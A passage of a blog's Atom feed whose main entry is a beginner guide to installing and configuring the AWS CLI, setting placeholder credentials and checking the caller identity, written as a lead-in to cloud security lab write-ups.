    <category term="Vulnlab" scheme="http://example.com/tags/Vulnlab/"/>
    
    <category term="Netexec" scheme="http://example.com/tags/Netexec/"/>
    
    <category term="Windows" scheme="http://example.com/tags/Windows/"/>
    
  </entry>
  
  <entry>
    <title>Getting Started with the AWS CLI</title>
    <link href="http://example.com/Getting-Started-with-the-AWS-CLI"/>
    <id>http://example.com/Getting-Started-with-the-AWS-CLI</id>
    <published>2024-11-01T11:59:00.000Z</published>
    <updated>2026-06-06T09:05:49.871Z</updated>
    
    <content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="/assets/css/APlayer.min.css"><script src="/assets/js/APlayer.min.js" class="aplayer-secondary-script-marker"></script><h2 id="AWS-CLI-Installation-Guide"><a href="#AWS-CLI-Installation-Guide" class="headerlink" title="AWS CLI Installation Guide"></a>AWS CLI Installation Guide</h2><p>This guide walks you through installing and configuring the AWS Command Line Interface (CLI) on your system.</p><h3 id="Prerequisites"><a href="#Prerequisites" class="headerlink" title="Prerequisites"></a>Prerequisites</h3><p>Make sure you have:</p><ul><li><strong>Python</strong> (3.8 or later)</li><li><strong>pip</strong> (the Python package installer)</li></ul><h4 id="Step-1-Installing-the-AWS-CLI"><a href="#Step-1-Installing-the-AWS-CLI" class="headerlink" title="Step 1: Installing the AWS CLI"></a>Step 1: Installing the AWS CLI</h4><p>To install the AWS CLI using <strong>pip</strong>, run:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -m pip install awscli</span><br></pre></td></tr></table></figure></div><p>For a system-wide installation, use:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> python -m pip install awscli</span><br></pre></td></tr></table></figure></div><p>To install for your user only, use:</p><div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -m pip install --user awscli</span><br></pre></td></tr></table></figure></div><p>Alternative Installations:<br>For macOS:<br>Download and run the installer directly from AWS:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">curl <span class="string">&quot;https://awscli.amazonaws.com/AWSCLIV2.pkg&quot;</span> -o <span class="string">&quot;AWSCLIV2.pkg&quot;</span></span><br><span class="line"><span class="built_in">sudo</span> installer -pkg AWSCLIV2.pkg -target /</span><br></pre></td></tr></table></figure></div><p>For Windows:<br><a class="link"   href="https://awscli.amazonaws.com/AWSCLIV2.msi" >Download the MSI installer from the AWS CLI website<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a> and follow the installation prompts.</p><p>For Linux:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt install awscli</span><br></pre></td></tr></table></figure></div><h4 id="Step-2-Verifying-the-Installation"><a href="#Step-2-Verifying-the-Installation" class="headerlink" title="Step 2: Verifying the Installation"></a>Step 2: Verifying the Installation</h4><p>To confirm that the AWS CLI is installed, run:</p><div class="code-container" data-rel="Powershell"><figure class="iseeu highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">aws <span class="literal">--version</span></span><br></pre></td></tr></table></figure></div><p>This should display the version number of the AWS CLI installed on your system.</p><h4 id="Step-3-Configuring-the-AWS-CLI"><a href="#Step-3-Configuring-the-AWS-CLI" class="headerlink" title="Step 3: Configuring the AWS CLI"></a>Step 3: Configuring the AWS CLI</h4><p>Run the following command to set up your AWS credentials and default settings:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">aws configure</span><br><span class="line">AWS Access Key ID [****************766Q]: MYACCESSKEY</span><br><span class="line">AWS Secret Access Key [****************DT9d]: MYSECRETKEY</span><br><span class="line">Default region name [us-west-2]:</span><br><span class="line">Default output format [None]:</span><br></pre></td></tr></table></figure></div><p>Alternate Configuration Options<br>You can also configure AWS credentials using environment variables or by editing the configuration files in ~&#x2F;.aws&#x2F;.</p><p>Environment Variables:<br>Set credentials in the shell for temporary configuration:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">export</span> AWS_ACCESS_KEY_ID=&lt;access_key&gt;</span><br><span class="line"><span class="built_in">export</span> AWS_SECRET_ACCESS_KEY=&lt;secret_key&gt;</span><br></pre></td></tr></table></figure></div><p>Shared Credentials File:<br>You can store your AWS credentials in a shared credentials file. Create or edit the file located at ~&#x2F;.aws&#x2F;credentials, and format it as follows:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">[default]</span><br><span class="line">aws_access_key_id=MYACCESSKEY</span><br><span class="line">aws_secret_access_key=MYSECRETKEY</span><br></pre></td></tr></table></figure></div><h4 id="To-view-the-details-of-the-Current-IAM-Identity"><a href="#To-view-the-details-of-the-Current-IAM-Identity" class="headerlink" title="To view the details of the Current IAM Identity"></a>To view the details of the Current IAM Identity</h4><p>This command retrieves the AWS account ID, IAM user or role ID, and ARN for the currently authenticated identity.</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">aws sts get-caller-identity</span><br></pre></td></tr></table></figure></div><p>If you have configured using –profile option to configure then</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">aws sts get-caller-identity --profile AWS</span><br></pre></td></tr></table></figure></div><p>Our output will be something like this:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">aws sts get-caller-identity --profile AWS</span><br><span class="line">&#123;</span><br><span class="line">    <span class="string">&quot;UserId&quot;</span>: <span class="string">&quot;AIDABCDEFGHIJKLMNO1234&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Account&quot;</span>: <span class="string">&quot;123456789012&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Arn&quot;</span>: <span class="string">&quot;arn:aws:iam::123456789012:user/myprofile-user&quot;</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div><h4 id="Stay-tuned-for-more-write-ups-on-cloud-security-challenges-from-PwnedLabs"><a href="#Stay-tuned-for-more-write-ups-on-cloud-security-challenges-from-PwnedLabs" class="headerlink" title="Stay tuned for more write-ups on cloud security challenges from PwnedLabs!"></a>Stay tuned for more write-ups on cloud security challenges from PwnedLabs!</h4>]]></content>
    
    
      
      
    <summary type="html">&lt;link rel=&quot;stylesheet&quot; class=&quot;aplayer-secondary-style-marker&quot; href=&quot;/assets/css/APlayer.min.css&quot;&gt;&lt;script src=&quot;/assets/js/APlayer.min.js&quot; cla</summary>
      
    
    
    
    <category term="Cloud" scheme="http://example.com/categories/Cloud/"/>
    
    
    <category term="Security" scheme="http://example.com/tags/Security/"/>
    
    <category term="AWS" scheme="http://example.com/tags/AWS/"/>
    
    <category term="Cloud" scheme="http://example.com/tags/Cloud/"/>
    
  </entry>
  
</feed>
